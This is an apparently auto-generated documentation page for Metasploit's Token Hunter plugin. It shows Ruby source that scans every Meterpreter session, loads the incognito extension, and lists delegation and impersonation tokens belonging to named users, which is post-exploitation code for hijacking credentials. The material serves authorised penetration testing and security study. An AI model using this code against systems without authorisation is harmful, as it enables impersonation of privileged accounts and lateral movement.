Class: Msf::Plugin::TokenHunter::TokenCommandDispatcher

Inherits:
Object
  • Object
show all
Includes:
Ui::Console::CommandDispatcher
Defined in:
plugins/token_hunter.rb

Instance Attribute Summary

Attributes included from Ui::Console::CommandDispatcher

#driver

Attributes included from Rex::Ui::Text::DispatcherShell::CommandDispatcher

#shell, #tab_complete_items

Instance Method Summary collapse

Methods included from Ui::Console::CommandDispatcher

#active_module, #active_module=, #active_session, #active_session=, #build_range_array, #docs_dir, #framework, #initialize, #load_config, #log_error, #remove_lines

Methods included from Rex::Ui::Text::DispatcherShell::CommandDispatcher

#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #docs_dir, #help_to_s, included, #initialize, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_directory, #tab_complete_filenames, #tab_complete_generic, #tab_complete_source_address, #unknown_command, #update_prompt

Instance Method Details

#cmd_token_hunt_user(*args) ⇒ Object 



22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
 
# File 'plugins/token_hunter.rb', line 22

def cmd_token_hunt_user(*args)
  opts = Rex::Parser::Arguments.new(
    '-h' => [ false, 'This help menu'],
    '-f' => [ true, 'A file containing a list of users to search for (one per line)']
  )

  opt_userfile = nil
  opt_users = []

  opts.parse(args) do |opt, _idx, val|
    case opt
    when '-h'
      print_line('Usage: token_hunt_user [options] <username> [username] .. [username]')
      print_line(opts.usage)
      return
    when '-f'
      opt_userfile = val
    else
      opt_users << val
    end
  end

  if opt_userfile
    ::File.open(opt_userfile, 'rb') do |fd|
      fd.each_line do |line|
        line.strip!
        next if line.empty?
        next if line =~ /^#/

        opt_users << line
      end
    end
  end

  opt_users.uniq!

  tokens_del = {}
  tokens_imp = {}

  framework.sessions.each_key do |sid|
    session = framework.sessions[sid]
    next if session.type != 'meterpreter'

    print_status(">> Scanning session #{session.sid} / #{session.session_host}")

    if !session.incognito
      session.core.use('incognito')
    end

    if !session.incognito
      print_status("!! Failed to load incognito on #{session.sid} / #{session.session_host}")
      next
    end

    res = session.incognito.incognito_list_tokens(0)
    next unless res

    res['delegation'].split("\n").each do |user|
      opt_users.each do |needle|
        ndom, nusr = needle.split('\\')
        if !nusr
          nusr = ndom
          ndom = nil
        end

        if (!user.nil? && ndom && (user.strip.downcase == needle.strip.downcase))
          print_status("FOUND: #{session.sid} - #{session.session_host} - #{user} (delegation)")
          next
        end

        _fdom, fusr = user.split('\\')

        if (!fusr.nil? && !ndom && (fusr.strip.downcase == nusr.strip.downcase))
          print_status("FOUND: #{session.sid} - #{session.session_host} - #{user} (delegation)")
        end
      end

      tokens_del[user] ||= []
      tokens_del[user] << session.sid
    end

    res['impersonation'].split("\n").each do |user|
      opt_users.each do |needle|
        ndom, nusr = needle.split('\\')
        if !nusr
          nusr = ndom
          ndom = nil
        end

        if (!user.nil? && ndom && (user.strip.downcase == needle.strip.downcase))
          print_status(">> Found #{session.sid} - #{session.session_host} - #{user} (impersonation)")
          next
        end

        _fdom, fusr = user.split('\\')
        if (!fusr.nil? && !ndom && (fusr.strip.downcase == nusr.strip.downcase))
          print_status(">> Found #{session.sid} - #{session.session_host} - #{user} (impersonation)")
        end
      end

      tokens_imp[user] ||= []
      tokens_imp[user] << session.sid
    end
  end
end

#commandsObject 



16
17
18
19
20
 
# File 'plugins/token_hunter.rb', line 16

def commands
  {
    'token_hunt_user' => 'Scan all connected Meterpreter sessions for active tokens corresponding to one or more users'
  }
end

#nameObject 



12
13
14
 
# File 'plugins/token_hunter.rb', line 12

def name
  'Token Hunter'
end